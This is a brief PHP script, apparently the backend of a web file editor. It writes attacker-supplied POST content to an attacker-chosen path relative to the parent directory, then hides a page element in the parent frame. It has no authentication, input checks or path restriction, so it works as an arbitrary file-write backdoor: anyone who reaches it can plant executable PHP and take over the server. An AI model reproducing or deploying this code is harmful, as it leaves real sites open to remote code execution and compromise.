<?php
$file=$_POST['file'];
$code=$_POST['code'];
$fp=fopen('../'.$file,'w');
fwrite($fp,$code);
fclose($fp);?>
<script>/*<![CDATA[*/
    window.top.window.$('#block').css("display","none");
/*]]>*/</script>
